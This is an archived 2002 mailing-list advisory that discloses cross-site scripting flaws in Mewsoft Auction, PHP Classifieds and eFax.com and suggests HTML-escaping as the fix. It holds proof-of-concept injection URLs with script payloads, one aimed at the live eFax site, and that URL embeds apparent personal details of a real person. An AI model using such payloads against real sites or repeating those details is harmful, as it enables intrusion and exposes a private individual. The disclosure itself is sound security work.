Mewsoft Auction, PHP Classifieds and eFax.com - CrossSiteScripting issues

From: § o m e 1 (exeat_private)
Date: Fri Jun 14 2002 - 11:15:05 PDT

Next message: Mikael Olsson: "Re: Flawed workaround in MS02-027 -- gopher can run on _any_ port, not just 70"

Previous message: Murray S. Mazer: "Follow-up on Lumigent Log Explorer 3.xx extended stored procedures buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Advisory name: SSI & CSS execution in Mewsoft Auction, PHP Classifieds and
eFax.com
Application: Mewsoft Auction (Perl script), PHP Classifieds (PHP), eFax.com
(ASP)
Date: 14.6.2002
Impact: remote user can execute shell commands & cross site scripting

=====================================


CrossSiteScripting @ Mewsoft Auction Script
<example>
http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search
&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script
>&Where=&Sort=Photo&Dir=
</example>

Program Name    : Mewsoft Auction
Program Version : 3.0
Home Page         : http://www.mewsoft.com


=====================================

CrossSiteScripting @ PHP Classifieds
<example>
http://www.xxxx.com/phpclassifieds/latestwap.php?url=>alert('OopS');<
/script>
</example>

Program Name    : PHP Classifieds
Program Version : 6.05
Home Page         : http://www.deltascripts.com/phpclassifieds


=====================================

https://www.efax.com/signup/plus/invalid_cc.asp?FirstName=Nadeem&LastName=al
i&OpSys=Win2000&Email=ra3e%5Fe7sas%40hotmail%2Ecom&PIN=9999&referralco
de=&service=OR%2DPortland%2D503%2DP&VID=5&BID=427%2D2379%2D3151&HomePhone=53
02723558&OFFERCODE=EFAX%5FPLUS&orderNumber=43423716&CreditCardType=MC&Credit
CardNumber=:)&expmonth=03&expyear=2003&StreetAddress=10621+Ced
ar+Ave&StreetAddress2=&City=Grass+Valley&MailRegion=CA&PostalCode=95945&Coun
try=United+States&LogoCode=&reorder_amount=&BillingFreq=Anually&startpage=1&
agreed=yes&USCities=OR%2DPortland%2D503%2DP&EurCities=NONE&AsiaCities=NONE&L
atCities=NONE&CCNumberError=<script>alert('OopS');</script>

eFax web site have many CSS, thats was just one example..


Solution: DON'T trust the user, filter every thing ex in PHP:
<?
$input = HTMLSpecialChars($input);
echo "<hr>your input was:<b>$input</b>";
?>

for your Information: CSS can be used SOMETIMES to execute shell commands on
the web server (using SSI, depending on the WebServer Configuretion) , not
only cookies hijack...


§ o m e 1
http://127.0.0.1/

Next message: Mikael Olsson: "Re: Flawed workaround in MS02-027 -- gopher can run on _any_ port, not just 70"
Previous message: Murray S. Mazer: "Follow-up on Lumigent Log Explorer 3.xx extended stored procedures buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jun 14 2002 - 13:14:11 PDT